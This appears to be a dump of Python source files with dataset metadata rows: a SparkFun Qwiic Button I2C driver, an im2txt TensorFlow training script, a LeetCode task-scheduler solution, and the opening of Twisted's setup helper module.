# Returns true if the queue of button click timestamps is full
# and false otherwise.
def is_clicked_queue_full(self):
"""
Reads the is_full bit of the CLICKED_QUEUE_STATUS register
:return: clicked_is_full
:rtype: bool
"""
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_full
self.clicked_is_full = int(clicked_queue_stat) & ~(0xFB)
self.clicked_is_full = self.clicked_is_full >> 2
# Return clicked_is_full as a bool
return bool(self.clicked_is_full)
# ----------------------------------------------------------
# is_clicked_queue_empty()
#
# Returns true if the queue click timestamps is empty and false
# otherwise.
def is_clicked_queue_empty(self):
"""
Reads the is_empty bit of the CLICKED_QUEUE_STATUS register
:return: clicked_is_empty
:rtype: bool
"""
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_empty
self.clicked_is_empty = int(clicked_queue_stat) & ~(0xFD)
# Shift clicked_is_empty to the zero bit
self.clicked_is_empty = self.clicked_is_empty >> 1
# Return clicked_is_empty as a bool
return bool(self.clicked_is_empty)
# ------------------------------------------------------------
# time_since_last_click()
#
# Returns how many milliseconds it has been since the last button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_last_click(self):
"""
Returns the four bytes of CLICKED_QUEUE_FRONT register.
Time in milliseconds
:return: CLICKED_QUEUE_FRONT
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# ------------------------------------------------------------
# time_since_first_click()
#
# Returns how many milliseconds it has been since the first button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_first_click(self):
"""
Returns the four bytes of CLICKED_QUEUE_BACK register.
Time in milliseconds
:return: CLICKED_QUEUE_BACK
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------------
# pop_clicked_queue()
#
# Returns the oldest value in the queue (milliseconds since first
# button click), and then removes it.
def pop_clicked_queue(self):
"""
Returns contents of CLICKED_QUEUE_BACK register and
writes a 1 to popRequest bit of CLICKED_QUEUE_STATUS
register.
:return: CLICKED_QUEUE_BACK
:rtype: int
"""
# Get the time in milliseconds since the button was first clicked
temp_data = self.time_since_first_click()
# Read CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
self.clicked_pop_request = 1
# Set pop_request bit to 1
clicked_queue_stat = clicked_queue_stat | (self.clicked_pop_request)
self._i2c.writeByte(self.address, self.CLICKED_QUEUE_STATUS, clicked_queue_stat)
return temp_data
# -------------------------------------------------------------
# LED_config(brightness, cycle_time, off_time, granularity)
#
# Configures the LED with the given max brightness, granularity
# (1 is fine for most applications), cycle time, and off time.
def LED_config(self, brightness, cycle_time, off_time, granularity = 1):
"""
Write brightness, cycle_time, off_time, and granularity
parameters to their respective registers: LED_BRIGHTNESS,
LED_PULSE_CYCLE_TIME, LED_PULSE_OFF_TIME, LED_PULSE_GRANULARITY
:param brightness: between 0 (led off) and 255 (max brightness)
:param cycle_time: total pulse cycle in in milliseconds
Range 0 to 0xFFFF
:param off_time: off time between pulses in milliseconds
Range 0 to 0xFFFF
:param granularity: the amount of steps it takes to get to led brightness
If not provided, granularity defaults to 1
:return: Nothing
:rtype: Void
"""
# Write brightness
self._i2c.writeByte(self.address, self.LED_BRIGHTNESS, brightness)
# Write cycle_time
self._i2c.writeWord(self.address, self.LED_PULSE_CYCLE_TIME, cycle_time)
# Write off_time
self._i2c.writeWord(self.address, self.LED_PULSE_OFF_TIME, off_time)
# Write granularity
self._i2c.writeByte(self.address, self.LED_PULSE_GRANULARITY, granularity)
# --------------------------------------------------------------
# LED_off()
#
# Turn the onboard LED off
def LED_off(self):
"""
Write zero's to all the LED registers: LED_BRIGHTNESS,
LED_PULSE_CYCLE_TIME, LED_PULSE_OFF_TIME, and LED_PULSE_GRANULARITY
defaults to zero.
:return: Nothing
:rtype: void
"""
self.LED_config(0, 0, 0)
# --------------------------------------------------------------
# LED_on(brightness)
#
# Turns the onboard LED on with specified brightness. Set brightness
# to an integer between 0 and 255, where 0 is off and 255 is max
# brightness.
def LED_on(self, brightness):
"""
Set LED on without pulse
:param brightness: between 0 (led off) and 255 (max brightness)
:return: Nothing
:rtype: Void
"""
self.LED_config(brightness, 0, 0)
| 39.279391
| 153
| 0.601535
|
import math
import qwiic_i2c
_DEFAULT_NAME = "Qwiic Button"
_QWIIC_BUTTON_DEFAULT_ADDRESS = 0x6F
_FULL_ADDRESS_LIST = list(range(0x08, 0x77+1))
_FULL_ADDRESS_LIST.remove(_QWIIC_BUTTON_DEFAULT_ADDRESS >> 1)
_AVAILABLE_I2C_ADDRESS = [_QWIIC_BUTTON_DEFAULT_ADDRESS]
_AVAILABLE_I2C_ADDRESS.extend(_FULL_ADDRESS_LIST)
class QwiicButton(object):
device_name = _DEFAULT_NAME
available_addresses = _AVAILABLE_I2C_ADDRESS
DEV_ID = 0x5D
ID = 0x00
FIRMWARE_MINOR = 0x01
FIRMWARE_MAJOR = 0x02
BUTTON_STATUS = 0x03
INTERRUPT_CONFIG = 0x04
BUTTON_DEBOUNCE_TIME = 0x05
PRESSED_QUEUE_STATUS = 0x07
PRESSED_QUEUE_FRONT = 0x08
PRESSED_QUEUE_BACK = 0x0C
CLICKED_QUEUE_STATUS = 0x10
CLICKED_QUEUE_FRONT = 0x11
CLICKED_QUEUE_BACK = 0x15
LED_BRIGHTNESS = 0x19
LED_PULSE_GRANULARITY = 0x1A
LED_PULSE_CYCLE_TIME = 0x1B
LED_PULSE_OFF_TIME = 0x1D
I2C_ADDRESS = 0x1F
event_available = 0
has_been_clicked = 0
is_pressed = 0
clicked_enable = 0
pressed_enable = 0
pressed_pop_request = 0
pressed_is_empty = 0
pressed_is_full = 0
clicked_pop_request = 0
clicked_is_empty = 0
clicked_is_full = 0
def __init__(self, address=None, i2c_driver=None):
self.address = address if address != None else self.available_addresses[0]
if i2c_driver == None:
self._i2c = qwiic_i2c.getI2CDriver()
if self._i2c == None:
print("Unable to load I2C driver for this platform.")
return
else:
self._i2c = i2c_driver
# -----------------------------------------------
# is_connected()
#
# Is an actual board connected to our system?
def is_connected(self):
return qwiic_i2c.isDeviceConnected(self.address)
# ------------------------------------------------
# begin()
#
# Initialize the system/validate the board.
def begin(self):
if self.is_connected() == True:
id = self._i2c.readByte(self.address, self.ID)
if id == self.DEV_ID:
return True
return False
# ------------------------------------------------
# get_firmware_version()
#
# Returns the firmware version of the attached devie as a 16-bit integer.
# The leftmost (high) byte is the major revision number,
# and the rightmost (low) byte is the minor revision number.
def get_firmware_version(self):
version = self._i2c.readByte(self.address, self.FIRMWARE_MAJOR) << 8
version |= self._i2c.readByte(self.address, self.FIRMWARE_MINOR)
return version
# -------------------------------------------------
# set_I2C_address(new_address)
#
# Configures the attached device to attach to the I2C bus using the specified address
def set_I2C_address(self, new_address):
# First, check if the specified address is valid
if new_address < 0x08 or new_address > 0x77:
return False
# Write new address to the I2C address register of the Qwiic Button
self._i2c.writeByte(self.address, self.I2C_ADDRESS, new_address)
self.address = new_address
# ---------------------------------------------------
# get_I2C_address()
#
# Returns the I2C address of the device
def get_I2C_address(self):
return self.address
# ---------------------------------------------------
# is_button_pressed()
#
# Returns 1 if the button/switch is pressed, 0 otherwise
def is_button_pressed(self):
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but is_pressed
self.is_pressed = int(button_status) & ~(0xFB)
# Shift is_pressed to the zero bit
self.is_pressed = self.is_pressed >> 2
# Return is_pressed as a bool
return bool(self.is_pressed)
# ----------------------------------------------------
# has_button_been_clicked()
#
# Returns 1 if the button/switch is clicked, and 0 otherwise
def has_button_been_clicked(self):
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but has_been_clicked
self.has_been_clicked = int(button_status) & ~(0xFD)
# Shift has_been_clicked to the zero bit
self.has_been_clicked = self.has_been_clicked >> 1
# Return has_been_clicked as a bool
return bool(self.has_been_clicked)
# ------------------------------------------------------
# get_debounce_time()
#
# Returns the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def get_debounce_time(self):
time_list = self._i2c.readBlock(self.address, self.BUTTON_DEBOUNCE_TIME, 2)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2)
return time
# -------------------------------------------------------
# set_debounce_time(time)
#
# Sets the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def set_debounce_time(self, time):
# First check that time is not too big
if time > 0xFFFF:
time = 0xFFFF
time1 = time & ~(0xFF00)
time2 = time & ~(0x00FF)
time2 = time2 >> 8
time_list = [time1, time2]
# Then write two bytes
self._i2c.writeWord(self.address, self.BUTTON_DEBOUNCE_TIME, time)
# -------------------------------------------------------
# enable_pressed_interrupt()
#
# The interrupt will be configured to trigger when the button
# is pressed. If enableClickedInterrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_pressed_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 1
# Set the pressed_enable bit
interrupt_config = interrupt_config | (self.pressed_enable << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_pressed_interrupt()
#
# Interrupt will no longer be configured to trigger when the
# button is pressed. If enable_clicked_interrupt() has also been called,
# then the interrupt will still trigger on the button click.
def disable_pressed_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 0
# Clear the pressed_enable bit
interrupt_config = interrupt_config & ~(1 << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# enable_clicked_interrupt()
#
# The interrupt will be configured to trigger when the button
# is clicked. If enable_pressed_interrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_clicked_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 1
# Set the clicked_enable bit
interrupt_config = interrupt_config | self.clicked_enable
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_clicked_interrupt()
#
# The interrupt will no longer be configured to trigger when
# the button is clicked. If enable_pressed_interrupt() has also
# been called, then the interrupt will still trigger on the
# button press.
def disable_clicked_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 0
# Clear the clicked_enable bit
interrupt_config = interrupt_config & (self.clicked_enable)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# available()
#
# Returns the eventAvailble bit. This bit is set to 1 if a
# button click or press event occurred.
def available(self):
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but the event_available bit
self.event_available = int(button_status) & ~(0xFE)
# Return event_available bit as a bool
return bool(self.event_available)
# -------------------------------------------------------
# clear_event_bits()
#
# Sets all button status bits (is_pressed, has_been_clicked,
# and event_available) to zero.
def clear_event_bits(self):
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear the last three bits
button_status = int(button_status) & ~(0x7)
# Write to BUTTON_STATUS register
self._i2c.writeByte(self.address, self.BUTTON_STATUS, button_status)
# -------------------------------------------------------
# reset_interrupt_config()
#
# Resets the interrupt configuration back to defaults.
def reset_interrupt_config(self):
self.pressed_enable = 1
self.clicked_enable = 1
# write 0b11 to the INTERRUPT_CONFIG register
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, 0b11)
self.event_available = 0
# Clear has_been_clicked, is_pressed too
# TODO: not sure if this is right
self.has_been_clicked = 0
self.is_pressed = 0
# Clear the BUTTON_STATUS register by writing a 0
self._i2c.writeByte(self.address, self.BUTTON_STATUS, 0x00)
# -------------------------------------------------------
# is_pressed_queue_full()
#
# Returns true if queue of button press time stamps is full,
# and false otherwise.
def is_pressed_queue_full(self):
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but isFull
self.pressed_is_full = int(pressed_queue_stat) & ~(0xFB)
self.pressed_is_full = self.pressed_is_full >> 2
# Return pressed_is_full as a bool
return bool(self.pressed_is_full)
# -------------------------------------------------------
# is_pressed_queue_empty()
#
# Returns true if the queue of button press time stamps is
# empty, and false otherwise.
def is_pressed_queue_empty(self):
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but is_empty
self.pressed_is_empty = int(pressed_queue_stat) & ~(0xFD)
# Shift pressed_is_empty to the zero bit
self.pressed_is_empty = self.pressed_is_empty >> 1
# Return pressed_is_empty as a bool
return bool(self.pressed_is_empty)
# ------------------------------------------------------
# time_since_last_press()
#
# Returns how many milliseconds it has been since the last
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_last_press(self):
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# time_since_first_press()
#
# Returns how many milliseconds it has been since the first
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_first_press(self):
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# pop_pressed_queue()
#
# Returns the oldest value in the queue (milliseconds since
# first button press), and then removes it.
def pop_pressed_queue(self):
# Get the time in milliseconds since the button was first pressed
temp_data = self.time_since_first_press()
# Read PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
self.pressed_pop_request = 1
# Set pop_request bit to 1
pressed_queue_stat = pressed_queue_stat | (self.pressed_pop_request)
self._i2c.writeByte(self.address, self.PRESSED_QUEUE_STATUS, pressed_queue_stat)
return temp_data
# ---------------------------------------------------------
# is_clicked_queue_full()
#
# Returns true if the queue of button click timestamps is full
# and false otherwise.
def is_clicked_queue_full(self):
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_full
self.clicked_is_full = int(clicked_queue_stat) & ~(0xFB)
self.clicked_is_full = self.clicked_is_full >> 2
# Return clicked_is_full as a bool
return bool(self.clicked_is_full)
# ----------------------------------------------------------
# is_clicked_queue_empty()
#
# Returns true if the queue click timestamps is empty and false
# otherwise.
def is_clicked_queue_empty(self):
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_empty
self.clicked_is_empty = int(clicked_queue_stat) & ~(0xFD)
# Shift clicked_is_empty to the zero bit
self.clicked_is_empty = self.clicked_is_empty >> 1
# Return clicked_is_empty as a bool
return bool(self.clicked_is_empty)
# ------------------------------------------------------------
# time_since_last_click()
#
# Returns how many milliseconds it has been since the last button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_last_click(self):
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# ------------------------------------------------------------
# time_since_first_click()
#
# Returns how many milliseconds it has been since the first button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_first_click(self):
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------------
# pop_clicked_queue()
#
# Returns the oldest value in the queue (milliseconds since first
# button click), and then removes it.
def pop_clicked_queue(self):
# Get the time in milliseconds since the button was first clicked
temp_data = self.time_since_first_click()
# Read CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
self.clicked_pop_request = 1
# Set pop_request bit to 1
clicked_queue_stat = clicked_queue_stat | (self.clicked_pop_request)
self._i2c.writeByte(self.address, self.CLICKED_QUEUE_STATUS, clicked_queue_stat)
return temp_data
# -------------------------------------------------------------
# LED_config(brightness, cycle_time, off_time, granularity)
#
# Configures the LED with the given max brightness, granularity
# (1 is fine for most applications), cycle time, and off time.
def LED_config(self, brightness, cycle_time, off_time, granularity = 1):
# Write brightness
self._i2c.writeByte(self.address, self.LED_BRIGHTNESS, brightness)
# Write cycle_time
self._i2c.writeWord(self.address, self.LED_PULSE_CYCLE_TIME, cycle_time)
# Write off_time
self._i2c.writeWord(self.address, self.LED_PULSE_OFF_TIME, off_time)
# Write granularity
self._i2c.writeByte(self.address, self.LED_PULSE_GRANULARITY, granularity)
# --------------------------------------------------------------
# LED_off()
#
# Turn the onboard LED off
def LED_off(self):
self.LED_config(0, 0, 0)
# --------------------------------------------------------------
# LED_on(brightness)
#
# Turns the onboard LED on with specified brightness. Set brightness
# to an integer between 0 and 255, where 0 is off and 255 is max
# brightness.
def LED_on(self, brightness):
self.LED_config(brightness, 0, 0)
| true
| true
|
1c421b356518bf4c59535b3263ca030af4edeada
| 3,562
|
py
|
Python
|
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | 5
|
2018-07-17T16:10:02.000Z
|
2018-07-17T21:53:37.000Z
|
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | null | null | null |
im2txt/train.py
|
iamdebanjangoswami/Image-Caption-IR--Im2txt
|
e871cdd03c80fd70695ae5a46f32351e35956684
|
[
"MIT"
] | null | null | null |
"""Train the model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt import configuration
from im2txt import show_and_tell_model
FLAGS = tf.app.flags.FLAGS
tf.flags.DEFINE_string("input_file_pattern", "",
"File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("inception_checkpoint_file", "",
"Path to a pretrained inception_v3 model.")
tf.flags.DEFINE_string("train_dir", "",
"Directory for saving and loading model checkpoints.")
tf.flags.DEFINE_boolean("train_inception", False,
"Whether to train inception submodel variables.")
tf.flags.DEFINE_integer("number_of_steps", 1000000, "Number of training steps.")
tf.flags.DEFINE_integer("log_every_n_steps", 1,
"Frequency at which loss and global step are logged.")
tf.logging.set_verbosity(tf.logging.INFO)
def main(unused_argv):
assert FLAGS.input_file_pattern, "--input_file_pattern is required"
assert FLAGS.train_dir, "--train_dir is required"
model_config = configuration.ModelConfig()
model_config.input_file_pattern = FLAGS.input_file_pattern
model_config.inception_checkpoint_file = FLAGS.inception_checkpoint_file
training_config = configuration.TrainingConfig()
# Create training directory.
train_dir = FLAGS.train_dir
if not tf.gfile.IsDirectory(train_dir):
tf.logging.info("Creating training directory: %s", train_dir)
tf.gfile.MakeDirs(train_dir)
# Build the TensorFlow graph.
g = tf.Graph()
with g.as_default():
# Build the model.
model = show_and_tell_model.ShowAndTellModel(
model_config, mode="train", train_inception=FLAGS.train_inception)
model.build()
# Set up the learning rate.
learning_rate_decay_fn = None
if FLAGS.train_inception:
learning_rate = tf.constant(training_config.train_inception_learning_rate)
else:
learning_rate = tf.constant(training_config.initial_learning_rate)
if training_config.learning_rate_decay_factor > 0:
num_batches_per_epoch = (training_config.num_examples_per_epoch /
model_config.batch_size)
decay_steps = int(num_batches_per_epoch *
training_config.num_epochs_per_decay)
def _learning_rate_decay_fn(learning_rate, global_step):
return tf.train.exponential_decay(
learning_rate,
global_step,
decay_steps=decay_steps,
decay_rate=training_config.learning_rate_decay_factor,
staircase=True)
learning_rate_decay_fn = _learning_rate_decay_fn
# Set up the training ops.
train_op = tf.contrib.layers.optimize_loss(
loss=model.total_loss,
global_step=model.global_step,
learning_rate=learning_rate,
optimizer=training_config.optimizer,
clip_gradients=training_config.clip_gradients,
learning_rate_decay_fn=learning_rate_decay_fn)
# Set up the Saver for saving and restoring model checkpoints.
saver = tf.train.Saver(max_to_keep=training_config.max_checkpoints_to_keep)
# Run training.
tf.contrib.slim.learning.train(
train_op,
train_dir,
log_every_n_steps=FLAGS.log_every_n_steps,
graph=g,
global_step=model.global_step,
number_of_steps=FLAGS.number_of_steps,
init_fn=model.init_fn,
saver=saver)
if __name__ == "__main__":
tf.app.run()
| 34.921569
| 80
| 0.71196
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt import configuration
from im2txt import show_and_tell_model
FLAGS = tf.app.flags.FLAGS
tf.flags.DEFINE_string("input_file_pattern", "",
"File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("inception_checkpoint_file", "",
"Path to a pretrained inception_v3 model.")
tf.flags.DEFINE_string("train_dir", "",
"Directory for saving and loading model checkpoints.")
tf.flags.DEFINE_boolean("train_inception", False,
"Whether to train inception submodel variables.")
tf.flags.DEFINE_integer("number_of_steps", 1000000, "Number of training steps.")
tf.flags.DEFINE_integer("log_every_n_steps", 1,
"Frequency at which loss and global step are logged.")
tf.logging.set_verbosity(tf.logging.INFO)
def main(unused_argv):
assert FLAGS.input_file_pattern, "--input_file_pattern is required"
assert FLAGS.train_dir, "--train_dir is required"
model_config = configuration.ModelConfig()
model_config.input_file_pattern = FLAGS.input_file_pattern
model_config.inception_checkpoint_file = FLAGS.inception_checkpoint_file
training_config = configuration.TrainingConfig()
train_dir = FLAGS.train_dir
if not tf.gfile.IsDirectory(train_dir):
tf.logging.info("Creating training directory: %s", train_dir)
tf.gfile.MakeDirs(train_dir)
g = tf.Graph()
with g.as_default():
model = show_and_tell_model.ShowAndTellModel(
model_config, mode="train", train_inception=FLAGS.train_inception)
model.build()
learning_rate_decay_fn = None
if FLAGS.train_inception:
learning_rate = tf.constant(training_config.train_inception_learning_rate)
else:
learning_rate = tf.constant(training_config.initial_learning_rate)
if training_config.learning_rate_decay_factor > 0:
num_batches_per_epoch = (training_config.num_examples_per_epoch /
model_config.batch_size)
decay_steps = int(num_batches_per_epoch *
training_config.num_epochs_per_decay)
def _learning_rate_decay_fn(learning_rate, global_step):
return tf.train.exponential_decay(
learning_rate,
global_step,
decay_steps=decay_steps,
decay_rate=training_config.learning_rate_decay_factor,
staircase=True)
learning_rate_decay_fn = _learning_rate_decay_fn
train_op = tf.contrib.layers.optimize_loss(
loss=model.total_loss,
global_step=model.global_step,
learning_rate=learning_rate,
optimizer=training_config.optimizer,
clip_gradients=training_config.clip_gradients,
learning_rate_decay_fn=learning_rate_decay_fn)
saver = tf.train.Saver(max_to_keep=training_config.max_checkpoints_to_keep)
tf.contrib.slim.learning.train(
train_op,
train_dir,
log_every_n_steps=FLAGS.log_every_n_steps,
graph=g,
global_step=model.global_step,
number_of_steps=FLAGS.number_of_steps,
init_fn=model.init_fn,
saver=saver)
if __name__ == "__main__":
tf.app.run()
| true
| true
|
1c421ba5cc25e81faa06ed54d8a9d618d0e83d7d
| 745
|
py
|
Python
|
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | 6
|
2021-05-21T01:10:42.000Z
|
2021-12-16T16:12:30.000Z
|
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | null | null | null |
task_scheduler_alt.py
|
tusharsadhwani/leetcode
|
a17a8a7587c5654f05fcd13ae7cdf47263ab2ea8
|
[
"MIT"
] | null | null | null |
from collections import Counter
class Solution:
def leastInterval(self, tasks: list[str], n: int) -> int:
counters = list(Counter(tasks).values())
counters.sort()
max_freq = counters.pop()
max_idle_time = (max_freq - 1) * n
idle_time = max_idle_time
while counters and idle_time > 0:
idle_time -= min(max_freq - 1, counters.pop())
if idle_time < 0:
idle_time = 0
return len(tasks) + idle_time
tests = [
(
(["A", "A", "A", "B", "B", "B"], 2,),
8,
),
(
(["A", "A", "A", "B", "B", "B"], 0,),
6,
),
(
(["A", "A", "A", "A", "A", "A", "B", "C", "D", "E", "F", "G"], 2,),
16,
),
]
| 21.285714
| 75
| 0.436242
|
from collections import Counter
class Solution:
def leastInterval(self, tasks: list[str], n: int) -> int:
counters = list(Counter(tasks).values())
counters.sort()
max_freq = counters.pop()
max_idle_time = (max_freq - 1) * n
idle_time = max_idle_time
while counters and idle_time > 0:
idle_time -= min(max_freq - 1, counters.pop())
if idle_time < 0:
idle_time = 0
return len(tasks) + idle_time
tests = [
(
(["A", "A", "A", "B", "B", "B"], 2,),
8,
),
(
(["A", "A", "A", "B", "B", "B"], 0,),
6,
),
(
(["A", "A", "A", "A", "A", "A", "B", "C", "D", "E", "F", "G"], 2,),
16,
),
]
| true
| true
|
1c421bda6f16f21a6ab023a696c0e57cf3193402
| 14,249
|
py
|
Python
|
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/python/_setup.py
|
tirkarthi/twisted
|
74f1e5418742b5404210e4799ee1b914ef1f646b
|
[
"Unlicense",
"MIT"
] | null | null | null |
# -*- test-case-name: twisted.python.test.test_setup -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# pylint: disable=I0011,C0103,C9302,W9401,W9402
"""
Setuptools convenience functionality.
This file must not import anything from Twisted, as it is loaded by C{exec} in
C{setup.py}. If you need compatibility functions for this code, duplicate them
here.
@var _EXTRA_OPTIONS: These are the actual package names and versions that will
be used by C{extras_require}. This is not passed to setup directly so that
combinations of the packages can be created without the need to copy
package names multiple times.
@var _EXTRAS_REQUIRE: C{extras_require} is a dictionary of items that can be
passed to setup.py to install optional dependencies. For example, to
install the optional dev dependencies one would type::
pip install -e ".[dev]"
This has been supported by setuptools since 0.5a4.
@var _PLATFORM_INDEPENDENT: A list of all optional cross-platform dependencies,
as setuptools version specifiers, used to populate L{_EXTRAS_REQUIRE}.
@var _EXTENSIONS: The list of L{ConditionalExtension} used by the setup
process.
@var notPortedModules: Modules that are not yet ported to Python 3.
"""
import io
import os
import platform
import re
import sys
from distutils.command import build_ext
from distutils.errors import CompileError
from setuptools import Extension, find_packages
from setuptools.command.build_py import build_py
# Do not replace this with t.p.compat imports, this file must not import
# from Twisted. See the docstring.
if sys.version_info < (3, 0):
_PY3 = False
else:
_PY3 = True
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="https://twistedmatrix.com/",
project_urls={
'Documentation': 'https://twistedmatrix.com/documents/current/',
'Source': 'https://github.com/twisted/twisted',
'Issues': 'https://twistedmatrix.com/trac/report',
},
license="MIT",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
)
_dev = [
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'towncrier >= 17.4.0'
]
if not _PY3:
# These modules do not yet work on Python 3.
_dev += [
'twistedchecker >= 0.4.0',
'pydoctor >= 16.2.0',
]
_EXTRA_OPTIONS = dict(
dev=_dev,
tls=[
'pyopenssl >= 16.0.0',
# service_identity 18.1.0 added support for validating IP addresses in
# certificate subjectAltNames
'service_identity >= 18.1.0',
# idna 2.3 introduced some changes that break a few things. Avoid it.
# The problems were fixed in 2.4.
'idna >= 0.6, != 2.3',
],
conch=[
'pyasn1',
'cryptography >= 2.6',
'appdirs >= 1.4.0',
'bcrypt >= 3.0.0',
],
soap=['soappy'],
serial=['pyserial >= 3.0',
'pywin32 != 226; platform_system == "Windows"'],
macos=['pyobjc-core',
'pyobjc-framework-CFNetwork',
'pyobjc-framework-Cocoa'],
windows=['pywin32 != 226'],
http2=['h2 >= 3.0, < 4.0',
'priority >= 1.1.0, < 2.0'],
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
